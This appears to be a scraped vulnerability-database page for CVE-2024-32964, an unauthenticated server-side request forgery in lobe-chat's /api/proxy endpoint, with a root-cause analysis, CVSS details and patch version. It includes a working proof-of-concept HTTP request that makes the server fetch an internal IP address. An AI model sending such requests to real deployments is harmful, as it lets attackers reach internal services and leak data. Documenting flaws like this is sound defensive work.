9

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-32964

GHSA ID

GHSA-mxhq-xw3g-rphc

EPSS Score

0.95499%

CWE

CWE-918

Published

5/10/2024

Updated

5/14/2024

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-32964

CVE-2024-32964: lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability

Summary

The latest version of lobe-chat(by now v0.141.2) has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.

Details

visit https://chat-preview.lobehub.com/settings/agent
you can attack all internal services by /api/proxy and get the echo in http response :)

PoC

POST /api/proxy HTTP/2
Host: xxxxxxxxxxxxxxxxx
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346846.0.0.0
Content-Length: 23
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/agent
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7

http://172.23.0.1:8000/

Impact

SSRF ,All users will be impacted.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2024-32964

CVE-2024-32964:

9

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-32964

GHSA ID

GHSA-mxhq-xw3g-rphc

EPSS Score

0.95499%

CWE

CWE-918

Published

5/10/2024

Updated

5/14/2024

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
@lobehub/chat	npm	<= 0.150.5	0.150.6

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stemmed from the original implementation of the /api/proxy endpoint's POST handler which: 1. Accepted raw user input as a URL without parsing/validation 2. Directly passed this input to fetch() 3. Lacked DNS resolution checks 4. Had no mechanism to prevent internal network targets. The fix introduced DNS lookup, IP validation using the 'ip' package, and internal network checks, confirming the original function's vulnerability. The pre-patch code's direct fetch(url) pattern with unvalidated input is a classic SSRF vulnerability pattern.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

9

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2024-32964: lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability

Summary

Details

PoC

Impact

CVE-2024-32964:

9

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Technical Details

9

9

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2024-32964: lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability

Summary

Details

PoC

Impact

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI